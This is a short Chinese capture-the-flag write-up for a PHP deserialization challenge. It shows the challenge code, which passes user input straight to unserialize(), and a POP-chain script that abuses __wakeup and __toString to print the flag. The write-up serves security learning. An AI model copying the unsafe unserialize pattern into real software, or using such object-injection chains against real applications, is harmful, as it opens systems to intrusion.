很简单的一道反序列化不多赘述了
思路就是Moon中的__wakeup 调用 Ion_Fan_princess中的__toString,然后再调用call()函数
代码
<?php
include "flag.php";
highlight_file(__FILE__);
class Moon{
public $name="月亮";
public function __toString(){
return $this->name;
}
public function __wakeup(){
echo "我是".$this->name."快来赏我";
}
}
class Ion_Fan_Princess{
public $nickname="牛夫人";
public function call(){
global $flag;
if ($this->nickname=="小甜甜"){
echo $flag;
}else{
echo "以前陪我看月亮的时候,叫人家小甜甜!现在新人胜旧人,叫人家".$this->nickname."。\n";
echo "你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊!\n";
}
}
public function __toString(){
$this->call();
return "\t\t\t\t\t\t\t\t\t\t----".$this->nickname;
}
}
if (isset($_GET['code'])){
unserialize($_GET['code']);
}else{
$a=new Ion_Fan_Princess();
echo $a;
}POP链
<?php
class Moon{
public $name="月亮";
}
class Ion_Fan_Princess{
public $nickname="牛夫人";
}
$a = new Ion_Fan_Princess();
$a->nickname="小甜甜";
$b = new Moon();
$b->name = $a;
echo urlencode(serialize($b));